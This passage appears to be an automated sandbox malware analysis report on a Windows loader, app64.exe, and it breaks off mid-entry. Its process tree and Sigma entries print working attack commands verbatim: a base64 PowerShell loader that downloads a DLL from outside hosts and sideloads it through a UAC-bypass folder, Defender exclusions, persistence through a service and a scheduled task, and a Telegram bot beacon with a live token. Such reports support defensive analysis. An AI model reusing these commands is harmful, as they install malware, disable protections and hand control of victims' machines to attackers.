Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
app64.exe

Overview

General Information

Sample name:app64.exe
Analysis ID:1545289
MD5:40b887735996fc88f47650c322273a25
SHA1:e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256:d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
Tags:exeuser-NDA0E
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • app64.exe (PID: 2696 cmdline: "C:\Users\user\Desktop\app64.exe" MD5: 40B887735996FC88F47650C322273A25)
  • cmd.exe (PID: 5956 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2124 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 764 cmdline: "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5780 cmdline: "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • xcopy.exe (PID: 5488 cmdline: xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • cmd.exe (PID: 5784 cmdline: "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • printui.exe (PID: 6656 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 3752 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 7156 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6620 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6436 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1400 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7132 cmdline: cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5548 cmdline: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 7120 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 2556 cmdline: sc start x590769 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 1632 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 2944 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 49672519E74E8AD135DAE7345BCEFF41)
            • cmd.exe (PID: 4612 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 5580 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6568 cmdline: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5656 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4744 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6428 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 2696 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6580 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 5276 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4672 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 432 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3184 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5864 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2820 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4332 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3092 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4480 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3936 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • console_zero.exe (PID: 6284 cmdline: C:\Windows\System32\console_zero.exe MD5: 49672519E74E8AD135DAE7345BCEFF41)
    • cmd.exe (PID: 5860 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6100 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2124JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2124INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1f6d8:$b2: ::FromBase64String(
    • 0x1fbe5:$b2: ::FromBase64String(
    • 0x20221:$b2: ::FromBase64String(
    • 0x227a9:$b2: ::FromBase64String(
    • 0xae0ad:$b2: ::FromBase64String(
    • 0xae5b6:$b2: ::FromBase64String(
    • 0xaf1e9:$b2: ::FromBase64String(
    • 0x12ae98:$b2: ::FromBase64String(
    • 0x12b3a1:$b2: ::FromBase64String(
    • 0x155c7c:$b2: ::FromBase64String(
    • 0x1a25d0:$b2: ::FromBase64String(
    • 0x1a2cf1:$b2: ::FromBase64String(
    • 0x1a31fa:$b2: ::FromBase64String(
    • 0x1f1b8a:$b2: ::FromBase64String(
    • 0x212672:$b2: ::FromBase64String(
    • 0x21a1fa:$b2: ::FromBase64String(
    • 0x23c776:$b2: ::FromBase64String(
    • 0x23cc81:$b2: ::FromBase64String(
    • 0x23d396:$b2: ::FromBase64String(
    • 0x23da5c:$b2: ::FromBase64String(
    • 0x26fa86:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 6620INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xd3e0:$b2: ::FromBase64String(
    • 0xd529:$b2: ::FromBase64String(
    • 0xd7e0:$b2: ::FromBase64String(
    • 0xd92a:$b2: ::FromBase64String(
    • 0xe2ca:$b2: ::FromBase64String(
    • 0xe40f:$b2: ::FromBase64String(
    • 0x24051:$b2: ::FromBase64String(
    • 0x3a664:$b2: ::FromBase64String(
    • 0x3ea03:$b2: ::FromBase64String(
    • 0x66461:$b2: ::FromBase64String(
    • 0xf1c2a:$b2: ::FromBase64String(
    • 0xf8689:$b2: ::FromBase64String(
    • 0x165955:$b2: ::FromBase64String(
    • 0x165a9c:$b2: ::FromBase64String(
    • 0x165ddf:$b2: ::FromBase64String(
    • 0x1660e1:$b2: ::FromBase64String(
    • 0x2061aa:$b2: ::FromBase64String(
    • 0x282402:$b2: ::FromBase64String(
    • 0x282547:$b2: ::FromBase64String(
    • 0x28f2cd:$b2: ::FromBase64String(
    • 0x28f412:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    amsi64_2124.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      amsi64_2124.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
        amsi64_6620.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2124, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 6656, ProcessName: printui.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(
